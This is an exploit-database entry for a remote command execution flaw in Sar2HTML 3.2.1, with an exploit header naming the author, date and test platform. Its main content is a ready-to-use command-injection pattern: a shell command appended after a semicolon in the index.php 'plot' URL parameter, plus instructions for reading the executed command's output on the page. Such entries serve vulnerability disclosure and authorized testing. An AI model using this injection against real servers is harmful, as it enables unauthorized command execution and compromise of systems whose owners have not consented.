Sar2HTML 3.2.1 Remote Command Execution

Sar2HTML version 3.2.1 suffers from a remote code execution vulnerability.

MD5 | 5da1b9b95552ebcda22bf1491728e7bf

# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:
# Software Link:
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.

Related Posts